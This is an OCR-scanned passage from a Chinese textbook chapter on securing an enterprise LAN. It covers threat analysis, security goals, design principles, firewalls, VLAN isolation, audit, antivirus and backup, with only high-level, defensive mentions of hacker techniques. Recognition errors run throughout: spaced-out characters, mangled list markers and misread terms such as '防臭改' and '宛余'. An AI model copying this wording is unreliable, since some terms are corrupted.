NT 操作 系统 或 者 其 他 任何 商用 UNIX 操作 系统 ,其 开发 厂商 必然 有 其 Back-Door。 可 以 这 
样 讲 : 没有 完全 安全 的 操作 系统 。 但 是 ,可 以 对 现 有 的 操作 平台 进行 安全 配置 ,对 操作 和 访 
问 权 限 进行 严格 控制 ,提高 系统 的 安全 性 。 因 此 ,不 但 要 选用 尽 可 能 可 靠 的 操作 系统 和 硬件 
平台 ,而且 必须 加 强 登 录 过 程 的 认证 (特别 是 在 到 达 服 务 器 主机 之 前 的 认证 ) ,确保 用 户 的 合 
法 性 ; 其 次 ,应 该 严格 限制 登录 者 的 操作 权限 ,将 其 完成 的 操作 限制 在 最 小 的 范围 内 。 

4. 应 用 的 安全 风险 分 析 

应 用 系统 的 安全 跟 具 体 的 应 用 有 关 , 它 涉及 很 多 方面 。 应 用 系统 的 安全 是 动态 的 .不断 
变化 的 。 应 用 的 安全 性 也 涉及 信息 的 安全 性 , 它 包 括 很 多 方面 。 

CD. 应 用 系统 的 安全 是 动态 的 .不 断 变化 的 。 应 用 的 安全 涉及 面 很 广 , 以 目前 Internet 
上 应 用 最 为 广泛 的 E-mail 系统 来 说 ,其 解决 方案 有 几 十 种 ,但 其 系统 内 部 的 编码 甚至 编译 
器 导致 的 BUG 是 很 少 有 人 能 够 发 现 的 ,因此 一 套 详 尽 的 测试 软件 是 非常 必需 的 。 但 是 应 
用 系统 是 不 断 发 展 且 应 用 类 型 是 不 断 增 加 的 ,其 结果 是 安全 漏洞 也 是 不 断 增加 且 隐 藏 越 来 


越 深 。 因 此 ,保证 应 用 系统 的 安全 也 是 一 个 随 网 络 发 展 不 断 完善 的 过 程 。 

(2) 应 用 的 安全 性 涉及 信息 ,数据 的 安全 性 。 信 息 的 安全 性 涉及 机 密 信息 泄露 .未 经 授 
权 的 访问 \ 破 坏 信息 完整 性 ,假冒 .破坏 系统 的 可 用 性 等 。 由 于 这 个 企业 局 域 网 跨度 不 大 , 绝 
大 部 分 重要 信息 都 在 内 部 网 络 传递 ,因此 信息 的 机 密 性 和 完整 性 是 可 以 保证 的 。 对 于 有 些 
特别 重要 的 信息 需要 对 内 部 网 络 进行 保密 的 (如 领导 子 网 、 财 务 系统 传递 的 重要 信息 ), 可 以 
考虑 在 应 用 级 进行 加 密 , 针 对 具体 的 应 用 直接 在 应 用 系统 开发 时 进行 加 密 。 

5. 管理 的 安全 风险 分 析 

管理 是 网 络 安全 中 最 重要 的 部 分 , 责 权 不 明 , 管 理 混乱 、 安 全 管理 制度 不 健全 及 缺乏 可 
操作 性 等 都 可 能 引起 管理 安全 的 风险 。 责 权 不 明 , 管 理 混乱 ,使 得 一 些 员 工 或 管理 员 随 便 让 
一 些 非 本 地 员工 甚至 外 来 人 员 进 入 机 房 重 地 ,或 者 员工 有 意 无 意 泄露 他 们 所 知道 的 一 些 重 
要 信息 ,而 管理 上 却 没 有 相应 制度 来 约束 。 

当 网 络 出 现 攻 击 行为 或 网 络 受 到 其 他 一 些 安全 威胁 时 (如 内 部 人 员 的 违规 操作 等 ) ,无 
法 进行 实时 的 检测 ,监控 .报告 与 预警 。 同 时 , 当 事 故 发 生 后 ,也 无 法 提供 黑客 攻击 行为 的 追 
踪 线 索 及 破案 依据 , 即 缺 乏 对 网 络 的 可 控 性 与 可 审查 性 。 这 就 要 求 必 须 对 站 点 的 访问 活动 
进行 多 层次 的 记录 ,及 时 发 现 非法 入 侵 行为 。 

建立 全 新 网 络 安全 机 制 ,必须 深刻 理解 网 络 并 能 提供 直接 的 解决 方案 ,因此 ,最 可 行 的 
做 法 是 管理 制度 和 管理 解决 方案 的 结合 。 

6. 黑客 攻击 

黑客 的 攻击 行动 是 无 时 无 刻 不 在 进行 的 ,而 且 会 利用 系统 和 管理 上 的 一 切 可 能 利用 的 
漏洞 。 公 开 服 务 器 存在 漏洞 的 一 个 典型 例证 ,是 黑客 可 以 轻易 地 骗 过 公开 服务 器 软件 ,得 到 
UNIX 的 口令 文件 并 将 之 送 回 。 黑 客 侵 入 UNIX 服务 器 后 ,有 可 能 修改 特权 ,从 普通 用 户 变 
为 高 级 用 户 , 一 旦 成 功 ,黑客 可 以 直接 进入 口令 文件 。 黑客 还 能 开发 欺骗 程序 ,将 其 装 入 
UNIX 服务 器 中 ,用 以 监听 登录 会 话 。 当 它 发 现 有 用 户 登录 时 , 便 开始 存储 一 个 文件 ,这 样 
黑客 就 拥有 了 他 人 的 账户 和 口令 。 为 了 防止 黑客 ,需要 设置 公开 服务 器 ,使 得 它 不 离开 自己 
的 空间 而 进入 另外 的 目录 。 另 外 ,还 应 设置 组 特权 ,不 允许 任何 使 用 公开 服务 器 的 人 访问 
WWW 页 面 文 件 以 外 的 东西 。 在 这 个 企业 的 局 域 网 内 可 以 综合 采用 防火 墙 技 术 、Web 页 面 
保护 技术 .入 侵 检测 技术 .安全 评估 技术 来 保护 网 络 内 的 信息 资源 ,防止 黑客 攻击 。 

7. 通用 网 关 接 口 (CGD 漏 洞 

有 一 类 风险 涉及 通用 网 关 接 口 (CGI) 脚 本 。 许 多 页 面 文件 指向 其 他 页 面 或 站 点 的 超 链 
接 , 然 而 有 些 站 点 用 到 这 些 超 链 接 所 指 站 点 寻找 特定 信息 。 搜 索引 擎 是 通过 CGI 脚本 执行 
的 方式 实现 的 。 黑 客 可 以 修改 这 些 CGI 脚本 以 执行 他 们 的 非法 任务 。 通 常 , 这 些 CGI 脚本 
只 能 在 这 些 所 指 WWW 服务 器 中 寻找 ,但 如 果 进 行 一 些 修改 ,他 们 就 可 以 在 WWW 服务 器 
之 外 进行 寻找 。 要 防止 这 类 问题 发 生 ,应 将 这 些 CGI 脚本 设置 为 较 低 级 用 户 特权 。 提 高 系 
统 的 抗 破坏 能 力 ,提高 服务 器 备份 与 恢复 能 力 ,提高 站 点 内 容 的 防臭 改 与 自动 修复 能 力 。 

8. 恶意 代码 

恶意 代码 不 仅 包 括 病 毒 , 还 包括 蠕虫 .特洛伊 木马 .逻辑 炸弹 和 其 他 未 经 同意 的 软件 。 
应 该 加 强 对 恶意 代码 的 检测 。 

9. 病毒 的 攻击 

计算 机 病毒 一 直 是 计算 机 安全 的 主要 威胁 ,能 在 Internet 上 传播 的 新 型 病毒 ,例如 通过 
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E-mail 传播 的 病毒 ,增加 了 这 种 威胁 的 程度 。 病 毒 的 种 类 和 传染 方式 也 在 增加 ,国际 空间 
的 病毒 总 数 已 达 上 万 甚至 更 多 。 当 然 ,查看 文档 浏览 图 像 或 在 Web 上 填 表 都 不 用 担心 病 
毒 感染 ,然而 ,下 载 可 执行 文件 和 接收 来 历 不 明 的 E-mail 文件 需要 特别 警惕 ,否则 很 容易 使 
系统 导致 严重 的 破坏 。 典 型 的 “CIH” 病 毒 就 是 一 可 怕 的 例子 。 

10. 不 满 的 内 部 员工 

不 满 的 内 部 员工 可 能 在 WWW 站 点 上 开 些 小 玩笑 ,其 至 破坏 。 无 论 如 何 ,他 们 最 熟悉 
服务 器 、 小 程序 脚本 和 系统 的 弱点 。 对 于 已 经 离职 的 不 满员 工 , 可 以 通过 定期 改变 口令 和 
删除 系统 记录 以 减少 这 类 风险 。 但 还 有 心怀 不 满 的 在 职员 工 , 这 些 员 工 比 已 经 离开 的 员工 
能 造成 更 大 的 损失 ,例如 他 们 可 以 传 出 至 关 重要 的 信息 、 汇 露 安 全 重要 信息 、 错 误 地 进入 数 
据 库 、 删 除数 据 等 。 

11. 网 络 的 攻击 手段 

一 般 认 为 ,目前 对 网 络 的 攻击 手段 主要 表现 在 以 下 几 个 方面 。 

(1) 非 授 权 访问 : 没有 预先 经 过 同意 ,就 使 用 网 络 或 计算 机 资源 被 看 做 非 授 权 访 问 ,如 
有 意 避 开 系统 访问 控制 机 制 , 对 网 络 设备 及 资源 进行 非 正 常 使 用 ,或 擅自 扩大 权限 ,越权 访 
问 信 息 。 它 主要 有 假冒 .身份 攻击 ,非法 用 户 进 入 网 络 系统 进行 违法 操作 、 合 法 用 户 以 未 授 
权 方 式 进行 操作 等 形式 。 

(2) 信息 泄露 或 丢失 : 指 敏 感 数据 在 有 意 或 无 意 中 被 泄露 出 去 或 丢失 , 它 通常 包 括 , 信 
息 在 传输 中 丢失 或 泄露 (如 * 黑 客 " 利 用 电磁 泄漏 或 搭 线 窃 听 等 方式 可 截获 机 密 信息 ,或 通过 
对 信息 流向 流量 .通信 频 度 和 长 度 等 参数 的 分 析 ,推出 有 用 信息 ,如 用 户口 令 .账号 等 重要 
信息 ) ,信息 在 存储 介质 中 丢失 或 泄露 ,通过 建立 隐蔽 隧道 等 窃取 敏感 信息 等 。 

(3) 破坏 数据 完整 性 : 以 非法 手段 窃取 对 数据 的 使 用 权 , 删 除 、 修 改 、 插 入 或 重 发 某 些 
重要 信息 ,以 取得 有 益 于 攻击 者 的 响应 ; 恶意 添加 ,修改 数据 ,以 干扰 用 户 的 正常 使 用 。 

(4) 拒绝 服务 攻击 : 它 不 断 对 网 络 服务 系统 进行 干扰 ,改变 其 正常 的 作业 流程 ,执行 无 
关 程 序 使 系统 响应 减 慢 甚至 瘫痪 ,影响 正常 用 户 的 使 用 ,其 至 使 合法 用 户 被 排斥 而 不 能 进入 
计算 机 网 络 系统 或 不 能 得 到 相应 的 服务 。 

C5) 利用 网 络 传播 病毒 : 通过 网 络 传播 计算 机 病毒 ,其 破坏 性 大 大 高 于 单机 系统 ,而 且 
用 户 很 难 防范 。 


8.4 安全 需求 与 安全 目标 


1. 安全 需求 分 析 

通过 前 面 对 该 企业 局 域 网 结构 .应 用 及 安全 威胁 分 析 ,可 以 看 出 其 安全 问题 主要 集中 在 
对 服务 器 的 安全 保护 、 防 黑客 和 病毒 、 重 要 网 段 的 保护 以 及 管理 安全 上 。 因 此 ,必须 采取 相 
应 的 安全 措施 杜绝 安全 隐患 ,应 该 做 到 

公开 服务 器 的 安全 保护 ; 防止 黑客 从 外 部 攻击 ; 入 侵 检 测 与 监控 ; 信息 审计 与 记录 ; 
病毒 防护 ; 数据 安全 保护 ; 数据 备份 与 恢复 ; 网 络 的 安全 管理 。 

针对 这 个 企业 局 域 网 网 络 系统 的 实际 情况 ,在 系统 考虑 如 何 解 决 上 述 安 全 问题 的 设计 
时 应 满足 如 下 要 求 。 

CD 大 幅度 提高 系统 的 安全 性 (重点 是 可 用 性 和 可 控 性 )。 


(2) 保持 网 络 原 有 的 特点 , 即 对 网 络 的 协议 和 传输 具有 很 好 的 透明 性 ,能 透明 接 和 人 ,无 
须 更 改 网 络 设置 。 

O) 易于 操作 维护 ,并 便于 自动 化 管理 ,而 不 增加 或 少 增加 附加 操作 。 

(4) 尽量 不 影响 原 网 络 拓扑 结构 ,同时 便于 系统 及 系统 功能 的 扩展 。 

(5) 安全 保密 系统 具有 较 好 的 性 能 价格 比 ,一 次 性 投资 ,可 以 长 期 使 用 。 

(6) 安全 产品 具有 合法 性 ,以 及 经 过 国家 有 关 管 理 部 门 的 认可 或 认证 。 

(7) 分 布 实施 。 

2. 网 络 安全 策略 

安全 策略 是 指 在 一 个 特定 的 环境 中 ,为 保证 提供 一 定 级 别 的 安全 保护 所 必须 遵守 的 规 
则 。 该 安全 策略 模型 包括 了 建立 安全 环境 的 3 个 重要 组 成 部 分 。 

(1) 威严 的 法 律 : 安全 的 基石 是 社会 法 律 ,法规 与 手段 ,这 部 分 用 于 建立 一 套 安全 管理 
标准 和 方法 , 即 通 过 建立 与 信息 安全 相关 的 法 律 、 法 规 ,使 非法 分 子 慑 于 法 律 ,不 敢 轻 举 
X. 

(2) 先进 的 安全 技术 : 是 信息 安全 的 根本 保障 ,用 户 对 自身 面临 的 威胁 进行 风险 评估 ， 
决定 其 需要 的 安全 服务 种 类 ,选择 相应 的 安全 机 制 ,然后 集成 先进 的 安全 技术 。 

G) 严格 的 管理 : 各 网 络 使 用 机 构 \ 企 业 和 单位 应 建立 相宜 的 信息 安全 管理 办 法 ,加 强 
内 部 管理 ,建立 审计 和 跟踪 体系 ,提高 整体 信息 安全 意识 。 

3. 系统 安全 目标 

基于 以 上 的 分 析 , 这 个 局 域 网 网 络 系统 安全 应 该 实现 以 下 目标 。 

(1) 建立 一 套 完 整 可 行 的 网 络 安全 与 网 络 管理 策略 。 

(2) 将 内 部 网 络 ` 公 开 服 务 器 网 络 和 外 部 网 络 进行 有 效 隔离 ,避免 与 外 部 网 络 的 直接 
通信 。 

(3) 建立 网 站 各 主机 和 服务 器 的 安全 保护 措施 ,保证 它们 的 系统 安全 。 

(4) 对 网 上 服务 请 求 内 容 进 行 控制 ,使 非法 访问 在 到 达 主 机 前 被 拒绝 。 

(5) 加 强 合法 用 户 的 访问 认证 ,同时 将 用 户 的 访问 权限 控制 在 最 低 限度 。 

(6) 全 面 监视 对 公开 服务 器 的 访问 ,及 时 发 现 和 拒绝 不 安全 的 操作 和 黑客 攻击 行为 。 

(7) 加 强 对 各 种 访问 的 审计 工作 ,详细 记录 对 网 络 、 公 开 服 务 器 的 访问 行为 ,形成 完整 
的 系统 日 志 。 

(8) 备份 与 灾难 恢复 。 强 化 系统 备份 ,实现 系统 快速 恢复 。 

(9) 加 强 网 络 安全 管理 ,提高 系统 全 体 人 员 的 网 络 安全 意识 和 防范 技术 。 


8.5 网 络 安全 方案 总 体 设计 


1. 安全 方案 设计 原则 

在 对 这 个 企业 局 域 网 网 络 系统 安全 方案 设计 、 规 划 时 , 应 遵循 以 下 原则 。 

(1) 综合 性 、 整 体 性 原则 : 应 用 系统 工程 的 观点 、 方 法 ,分 析 网 络 的 安全 及 具体 措施 。 
安全 措施 主要 包括 行政 法 律 手段 .各 种 管理 制度 (人 员 审 查 . 工 作 流程 、 维 护 保障 制度 等 以 
及 专业 措施 (识别 技术 、 存 取 控 制 、 密 码 \ 低 辐射 ,容错 、 防 病毒 、 采 用 高 安全 产品 等 );。 较 好 的 
安全 措施 往往 是 多 种 方法 适当 综合 的 应 用 结果 ,一 个 计算 机 网 络 , 包 括 个 人 、 设 备 、 软 件数 
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据 等 ,这 些 环节 在 网 络 中 的 地 位 和 影响 作用 ,也 只 有 从 系统 综合 整体 的 角度 去 看 待 .分 析 , 才 
能 取得 有 效 、 可 行 的 措施 。 即 计算 机 网 络 安全 应 遵循 整体 安全 性 原则 ,根据 规定 的 安全 策略 
制定 出 合理 的 网 络 安全 体系 结构 。 

(2) 需求 ,风险 .代价 平衡 的 原则 : 对 任 一 网 络 ,绝对 安全 难以 达到 ,也 不 一 定 是 必要 
的 。 对 一 个 网 络 进行 实际 研究 (包括 任务 、 性 能 、 结 构 、 可 靠 性 、 可 维护 性 等 ), 并 对 网 络 面临 
的 威胁 及 可 能 承担 的 风险 进行 定性 与 定量 相 结合 的 分 析 , 然 后 制订 规范 和 措施 ,确定 本 系统 
的 安全 策略 。 

(3) 一 致 性 原则 : 主要 是 指 网 络 安全 问题 应 与 整个 网 络 的 工作 周期 (或 生命 周期 ) 同 时 
存在 ,制定 的 安全 体系 结构 必须 与 网 络 的 安全 需求 相 一 致 。 安 全 的 网 络 系统 设计 (包括 初步 
或 详细 设计 ) 及 实施 计划 、 网 络 验证 、 验 收 ,运行 等 ,都 要 有 安全 的 内 容 及 措施 ,实际 上 ,在 网 
络 建设 的 开始 就 考虑 网 络 安全 对 策 , 比 在 网 络 建设 好 后 再 考虑 安全 措施 ,不 但 容易 且 花 费 也 
小 得 多 。 

(4) 易 操作 性 原则 : 安全 措施 需要 人 为 去 完成 ,如 果 措 施 过 于 复杂 ,对 人 的 要 求 过 高 ， 
本 身 就 降低 了 安全 性 。 其 次 ,措施 的 采用 不 能 影响 系统 的 正常 运行 。 

(5) 分 步 实 施 原则 : 由 于 网 络 系统 及 其 应 用 扩展 范围 广阔 , 随 着 网 络 规模 的 扩大 及 应 
用 的 增加 ,网 络 脆弱 性 也 会 不 断 增 加 。 一 劳 永 逸 地 解决 网 络 安全 问题 是 不 现实 的 ,同时 由 于 
实施 信息 安全 措施 需 相当 大 的 费用 支出 。 因 此 分 步 实施 , 既 可 满足 网 络 系统 及 信息 安全 的 
基本 需求 ,也 可 节省 费用 开支 。 

(6) 多 重 保护 原则 : 任何 安全 措施 都 不 是 绝对 安全 的 ,都 可 能 被 攻破 。 但 是 建立 一 个 
多 重 保护 系统 ,各 层 保护 相互 补充 , 当 一 层 保护 被 攻破 时 ,其 他 层 保护 仍 可 保护 信息 的 安全 。 

(7) 可 评价 性 原则 : 如 何 预先 评价 一 个 安全 设计 并 验证 其 网 络 的 安全 性 ,这 需要 通过 
国家 有 关 网 络 信息 安全 测评 认证 机 构 的 评估 来 实现 。 

2. 安全 服务 、 机 制 与 技术 

COD 安全 服务 : 主要 有 控制 服务 、 对 象 认证 服务 、 可 靠 性 服务 等 ; 

(2) 安全 机 制 : 访问 控制 机 制 , 认 证 机 制 等 ; 

(3) 安全 技术 : 防火 墙 技术 、 鉴 别 技术 、 审 计 监 控 技 术 、 病 毒 防治 技术 等 。 

在 安全 的 开放 环境 中 ,用 户 可 以 使 用 各 种 安全 应 用 。 安 全 应 用 由 一 些 安全 服务 来 实现 ; 
而 安全 服务 又 是 由 各 种 安全 机 制 或 安全 技术 来 实现 的 。 应 当 指出 ,同一 安全 机 制 有 时 也 可 
以 用 于 实现 不 同 的 安全 服务 。 


8.6 网 络 安全 体系 结构 


通过 对 网 络 的 全 面 了 解 ,按照 安全 策略 的 要 求 , 风险 分 析 的 结果 及 整个 网 络 的 安全 目 
jk ,整个 网 络 措施 应 按 系 统 体系 建立 。 具 体 的 安全 控制 系统 由 物理 安全 、 网 络 安全 、 系 统 安 
` 信 息 安 全 应 用 安全 和 安全 管理 组 成 。 


8.6.1 物理 安全 


保证 计算 机 信息 系统 各 种 设备 的 物理 安全 是 整个 计算 机 信息 系统 安全 的 前 提 , 物 理 安 
全 是 保护 计算 机 网 络 设备 、 设 施 以 及 其 他 媒体 免 草 地震、 水 灾 、 火 灾 等 环境 事故 以 及 人 为 操 


bos 


作 失 误 或 错误 及 各 种 计算 机 犯罪 行为 导致 的 破坏 过 程 。 它 主要 包括 以 下 3 个 方面 。 

CD 环境 安全 : 对 系统 所 在 环境 的 安全 保护 ,如 区 域 保护 和 灾难 保护 ; (参见 (电子 计算 
机 机 房 设计 规范 》(GB50173 一 1993) 《计算 站 场地 技术 条 件 》(GB2887 一 1989)《 计 算 站 场 
地 安全 要 求 )(GB9361 一 1988)。 

(2) 设备 安全 : 主要 包括 设备 的 防盗 、 防 毁 、 防 电磁 信息 辐射 泄漏 ,防止 线路 截获 、 抗 电 
磁 干 扰 及 电源 保护 等 。 

(3) 媒体 安全 : 包括 媒体 数据 的 安全 及 媒体 本 身 的 安全 。 


8.6.2 网 络 安 全 


在 网 络 的 安全 方面 ,主要 考虑 两 个 大 的 层次 : 一 是 整个 网 络 结构 成 熟化 ,主要 是 优化 网 
络 结构 ; 二 是 整个 网 络 系统 的 安全 。 

1. 网 络 结构 

安全 系统 是 建立 在 网 络 系统 之 上 的 ,网 络 结构 的 安全 是 安全 系统 成 功 建立 的 基础 。 在 
整个 网 络 结构 的 安全 方面 ,主要 考虑 网 络 结构 .系统 和 路 由 的 优化 。 

网 络 结构 的 建立 要 考虑 环境 .设备 配置 与 应 用 情况 .远程 联网 方式 .通信 量 的 估算 、 网 络 
维护 管理 、 网 络 应 用 与 业务 定位 等 因素 。 成 熟 的 网 络 结构 应 具有 开放 人 性、 标准 化 可靠 性 ` 先 
进 性 和 实用 性 ,并且 应 该 有 结构 化 的 设计 ,充分 利用 现 有 资源 ,具有 运营 管理 的 简便 性 ,完善 
的 安全 保障 体系 。 网 络 结构 采用 分 层 的 体系 结构 ,利于 维护 管理 ,利于 更 高 的 安全 控制 和 业 
务 发 展 。 

网 络 结构 的 优化 ,在 网 络 拓扑 上 主要 考虑 到 宛 余 链 路 ; 防火 墙 的 设置 和 入 侵 检 测 的 实 
时 监控 等 。 

2. 网 络 系统 安全 

(1) 访问 控制 及 内 外 网 的 隔离 

访问 控制 可 以 通过 如 下 几 个 方面 来 实现 。 

CD 制定 严格 的 管理 制度 : 如 (用户 授权 实施 细则 》《 口 令 字 及 账户 管理 规范 》《 权 限 管 
理 制 度 ) 等 。 

© 配备 相应 的 安全 设备 : 在 内 部 网 络 与 外 部 网 络 之 间 , 设 置 防 火 墙 实现 内 外 网 的 隔离 
与 访问 控制 是 保护 内 部 网 络 安全 的 最 主要 .最 有 效 . 最 经 济 的 措施 之 一 。 防 火 墙 设置 在 不 同 
网 络 或 网 络 安全 域 之 间 信 息 的 唯一 出 入 口 。 

防火 墙 主要 的 种 类 是 包 过 滤 型 , 包 过 滤 防 火 墙 一 般 利用 IP 和 TCP 包 的 头 信息 对 进出 
被 保护 网 络 的 IP 包 信 息 进行 过 滤 ,能 根据 企业 的 安全 政策 来 控制 (允许 .拒绝 ,监测 ) 出 人 网 
络 的 信息 流 , 同 时 可 实现 网 络 地 址 转换 (NAT) .审计 与 实时 告警 等 功能 。 由 于 这 种 防火 墙 
安装 在 被 保护 网 络 与 路 由 器 之 间 的 通道 上 ,因此 也 对 被 保护 网 络 和 外 部 网 络 起 到 隔离 作用 。 

防火 墙 具 有 以 下 五 大 基本 功能 : 过 滤 进 .出 网 络 的 数据 ; 管理 进 、 出 网 络 的 访问 行为 ; 
封 堵 某 些 禁止 的 业务 ; 记录 通过 防火 墙 的 信息 内 容 和 活动 ; 对 网 络 攻击 的 检测 和 告警 。 

(2) 内 部 网 不 同 网 络 安全 域 的 隔离 及 访问 控制 

在 这 里 ,主要 利用 VLAN 技术 来 实现 对 内 部 子 网 的 物理 隔离 。 通 过 在 交换 机 上 划分 
VLAN 可 以 将 整个 网 络 划分 为 几 个 不 同 的 广播 域 ,实现 内 部 一 个 网 段 与 男 一 个 网 段 的 物理 
隔离 。 这 样 ,就 能 防止 影响 一 个 网 段 的 问题 穿 过 整个 网 络 传播 。 针 对 某 些 网 络 ,在 某 些 情况 
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下 , 它 的 一 些 局 域 网 的 某 个 网 段 比 另 一 个 网 段 更 受信 任 , 或 者 某 个 网 段 比 另 一 个 网 段 更 敏 
感 。 通 过 将 信任 网 段 与 不 信任 网 段 划分 在 不 同 的 VLAN 段 内 ,就 可 以 限制 局 部 网 络 安全 问 
题 对 全 局 网 络 造成 的 影响 。 

(3) 网 络 安全 检测 

网 络 系统 的 安全 性 取决 于 网 络 系统 中 最 薄弱 的 环节 。 如 何 及 时 发 现 网 络 系统 中 最 薄弱 
的 环节 ,如 何 最 大 限度 地 保证 网 络 系统 的 安全 ? 最 有 效 的 方法 是 定期 对 网 络 系统 进行 安全 
性 分 析 , 及 时 发 现 并 修正 存在 的 弱点 和 漏洞 。 

网 络 安全 检测 工具 通常 是 网 络 安全 性 评估 分 析 软 件 ,其 功能 是 用 实践 性 的 方法 扫描 分 
析 网 络 系统 ,检查 报告 系统 存在 的 弱点 和 漏洞 ,建议 补救 措施 和 安全 策略 ,达到 增强 网 络 安 
全 性 的 目的 。 检 测 工具 应 具备 以 下 功能 。 

C 具备 网 络 监控 ,分 析 和 自动 响应 功能 。 

© 找 出 经 常 发 生 问题 的 根源 所 在 。 

© 建立 必要 的 循环 过 程 确保 隐患 时 刻 被 纠正 ; 控制 各 种 网 络 安全 危险 。 

@ 漏洞 分 析 和 响应 。 

C) 配置 分 析 和 响应 。 

© 漏洞 形势 分 析 和 响应 。 

D 认证 和 趋势 分 析 。 

具体 体现 在 以 下 方面 : 

O 防火 墙 得 到 合理 配置 。 

© 内 外 Web 站 点 的 安全 漏洞 减 为 最 低 。 

@ 网 络 体系 达到 强壮 的 耐 攻击 性 。 

D 将 各 种 服务 器 操作 系统 ,如 E-mail 服务 器 、Web 服务 器 .应 用 服务 器 , 受 黑 客 攻击 的 
可 能 降 为 最 低 。 

© 对 网 络 访问 做 出 有 效 响应 ,保护 重要 应 用 系统 (如 财务 系统 ) 数 据 安 全 不 受 黑 客 攻击 
和 内 部 人 员 误 操作 的 侵害 。 

(4) 审计 与 监控 

审计 是 记录 用 户 使 用 计算 机 网 络 系统 进行 所 有 活动 的 过 程 , 它 是 提高 安全 性 的 重要 工 
具 。 它 不 仅 能 够 识别 谁 访问 了 系统 ,还 能 看 出 系统 正 被 怎样 地 使 用 。 对 于 确定 是 否 有 网 络 
攻击 的 情况 ,审计 信息 对 于 确定 问题 和 攻击 源 很 重要 。 同 时 ,系统 事件 的 记录 能 够 更 迅速 和 
系统 地 识别 问题 ,并 且 它 是 后 面 阶段 事故 处 理 的 重要 依据 。 另 外 ,通过 对 安全 事件 的 不 断 收 
集 与 积累 并 且 加 以 分 析 , 有 选择 性 地 对 其 中 的 某 些 站 点 或 用 户 进行 审计 跟踪 ,以 便 对 发 现 或 
可 能 产生 的 破坏 性 行为 提供 有 力 的 证 据 。 

因此 ,除了 使 用 一 般 的 网 管 软件 和 系统 监控 管理 系统 外 ,还 应 使 用 目前 较为 成 熟 的 网 络 
监控 设备 或 实时 入 侵 检测 设备 ,对 进出 各 级 局 域 网 的 常见 操作 进行 实时 检查 .监控 、 报 和 警 和 
阻 断 , 从 而 防止 针对 网 络 的 攻击 与 犯罪 行为 。 

(5) 网 络 防 病毒 

由 于 在 网 络 环境 下 ,计算 机 病毒 有 不 可 估量 的 威胁 性 和 破坏 力 , 因 此 ,计算 机 病毒 的 防 
范 是 网 络 安全 性 建设 中 重要 的 一 环 。 

网 络 反 病毒 技术 包括 预防 病毒 .检测 病毒 和 清除 病毒 3 种 技术 。 


CD 预防 病毒 技术 : 通过 自身 常 驻 系 统 内 存 ,优先 获得 系统 的 控制 权 , 监 视 和 判断 系统 
中 是 否 有 病毒 存在 ,进而 阻止 计算 机 病毒 进入 计算 机 系统 和 对 系统 进行 破坏 。 这 类 技术 有 
加 密 可 执行 程序 .引导 区 保护 ,系统 监控 与 读 写 控制 (如 防 病毒 软件 等 ) 。 

@ 检测 病毒 技术 : 通过 对 计算 机 病毒 的 特征 来 进行 判断 的 技术 ,如 自身 校 验 、 关 键 字 、 
文件 长 度 的 变化 等 。 

@ 清除 病毒 技术 : 通过 对 计算 机 病毒 的 分 析 , 开 发 出 具有 删除 病毒 程序 并 恢复 原文 件 
的 软件 。 

网 络 反 病毒 技术 的 具体 实现 方法 包括 对 网 络 服 务 器 中 的 文件 进行 频繁 扫描 和 监测 ; 在 
工作 站 上 用 防 病毒 芯片 和 对 网 络 目录 及 文件 设置 访问 权限 等 。 

所 选 的 防毒 软件 应 该 构造 全 网 统一 的 防 病毒 体系 。 主 要 面向 E-mail , Web 服务 器 ,以 
及 办 公 网 段 的 PC 服务 器 和 PC 等 。 支 持 对 网 络 、 服 务 器 和 工作 站 的 实时 病毒 监控 ; 能 够 在 
中 心 控 制 台 向 多 个 目标 分 发 新 版 杀毒 软件 ,并 监视 多 个 目标 的 病毒 防治 情况 ; 支持 多 种 平 
台 的 病毒 防范 ; 能 够 识别 广泛 的 已 知 和 未 知 病毒 ,包括 宏 病 毒 ; 支持 对 Internet/ Intranet 
服务 器 的 病毒 防治 ,能够 阻止 恶意 的 Java 或 ActiveX 小 程序 的 破坏 ; 支持 对 电子 邮件 附件 
的 病毒 防治 ,包括 Word, Excel 中 的 宏 病 毒 ; 支持 对 压缩 文件 的 病毒 检测 ; 支持 广泛 的 病毒 
处 理 选项 ,如 对 染 毒 文件 进行 实时 杀毒 .移出 、 重 新 命名 等 ; 支持 病毒 隔离 , 当 客 户 机 试图 下 
载 一 个 染 毒 文件 时 ,服务 器 可 自动 关闭 对 该 工作 站 的 连接 ; 提供 对 病毒 特征 信息 和 检测 引 
擎 的 定期 在 线 更 新 服务 ; 支持 日 志 记录 功能 ; 支持 多 种 方式 的 告警 功能 (如 声音 、 图 像 、 电 
子 邮 件 等 ) 等 。 

3 网络 备份 系统 

备份 系统 为 一 个 目的 而 存在 : 尽 可 能 快 地 全 盘 恢 复 运行 计算 机 系统 所 需 的 数据 和 系统 
信息 。 根 据 系统 安全 需求 可 选择 的 备份 机 制 有 场 点 内 高 速度 ,大 容量 自动 的 数据 存储 、 备 份 
与 恢复 ; 场 点 外 的 数据 存储 、 备 份 与 恢复 ; 对 系统 设备 的 备份 。 备 份 不 仅 在 网 络 系统 硬件 
故障 或 人 为 失误 时 起 到 保护 作用 ,也 在 入侵 者 非 授权 访问 或 对 网 络 攻击 及 破坏 数据 完整 性 
时 起 到 保护 作用 ,同时 也 是 系统 灾难 恢复 的 前 提 之 一 。 

在 确定 备份 的 指导 思想 和 备份 方案 之 后 ,就 要 选择 安全 的 存储 媒介 和 技术 进行 数据 备 
份 , 有 " 冷 备份 "和 *“ 热 备份 "两 种 。 热 备份 是 指 “ 在 线 ” 的 备份 , 即 下 载 备份 的 数据 还 在 整个 计 
算 机 系统 和 网 络 中 ,只 不 过 传 到 另 一 个 非 工作 的 分 区 或 是 另 一 个 非 实 时 处 理 的 业务 系统 中 
存放 。 冷 备份 是 指 “ 不 在 线 ” 的 备份 ,下 载 的 备份 存放 到 安全 的 存储 媒介 中 ,而 这 种 存储 媒介 
与 正在 运行 的 整个 计算 机 系统 和 网 络 没 有 直接 联系 ,在 系统 恢复 时 重新 安装 ,有 一 部 分 原始 
的 数据 长 期 保存 并 作为 查询 使 用 。 热 备份 的 优点 是 投资 大 、 调 用 快 .使 用 方便 ,在 系统 恢复 
中 需要 反复 调试 时 更 显 优势 。 热 备份 的 具体 做 法 是 : 可 以 在 主机 系统 开辟 一 块 非 工作 运行 
空间 ,专门 存放 备份 数据 , 即 分 区 备份 ; 也 可 以 将 数据 备份 到 另 一 个 子 系统 中 ,通过 主机 系 
统 与 子 系统 之 间 的 传输 ,同样 具有 速度 快 和 调用 方便 的 特点 ,但 投资 比较 昂贵 。 冷 备份 弥补 
